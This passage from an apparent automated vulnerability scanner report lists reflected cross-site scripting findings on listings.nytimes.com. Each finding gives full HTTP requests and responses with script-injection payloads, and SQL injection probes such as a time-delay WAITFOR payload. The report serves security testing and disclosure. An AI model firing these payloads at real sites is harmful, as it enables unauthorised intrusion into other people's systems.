c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:21:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91505
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABRQSAS=NGLKNADAEAJJMFFMIBBJIILP; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="DOrder" value="A56313"><script>alert(1)</script>b12c9d365d01799f3">
...[SNIP]...

4.193. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [DOrder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the DOrder request parameter is copied into the HTML document as plain text between tags. The payload d289f<script>alert(1)</script>7dd8a52e41d was submitted in the DOrder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=Ad289f<script>alert(1)</script>7dd8a52e41d&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c8
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:24:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=Ad289f<script>alert(1)</script>7dd8a52e41d&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80
...[SNIP]...

4.194. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [GroupId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the GroupId request parameter is copied into the HTML document as plain text between tags. The payload bd930<script>alert(1)</script>3775acfcd22 was submitted in the GroupId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3bd930<script>alert(1)</script>3775acfcd22&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strSt
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3bd930<script>alert(1)</script>3775acfcd22&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strSta
...[SNIP]...

4.195. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [GroupId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the GroupId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea4e4"><script>alert(1)</script>a8ffb7b062cca42c9 was submitted in the GroupId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=ea4e4"><script>alert(1)</script>a8ffb7b062cca42c9&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91575
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTSTCS=EGIPGLGAIAMPEJGKBOKNFMCK; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="GroupId" value="ea4e4"><script>alert(1)</script>a8ffb7b062cca42c9">
...[SNIP]...

4.196. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [KeyWord parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the KeyWord request parameter is copied into the HTML document as plain text between tags. The payload e36a7<script>alert(1)</script>44c7cfaf6039b697a was submitted in the KeyWord parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--e36a7<script>alert(1)</script>44c7cfaf6039b697a&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--e36a7<script>alert(1)</script>44c7cfaf6039b697a&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-
...[SNIP]...

4.197. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [KeyWord parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the KeyWord request parameter is copied into the HTML document as plain text between tags. The payload 20e2f<script>alert(1)</script>33582e99908 was submitted in the KeyWord parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=320e2f<script>alert(1)</script>33582e99908&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=320e2f<script>alert(1)</script>33582e99908&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&
...[SNIP]...

4.198. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [KeyWord parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the KeyWord request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd82d"><script>alert(1)</script>61c8bf1a9b1c6a1bf was submitted in the KeyWord parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=dd82d"><script>alert(1)</script>61c8bf1a9b1c6a1bf&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIds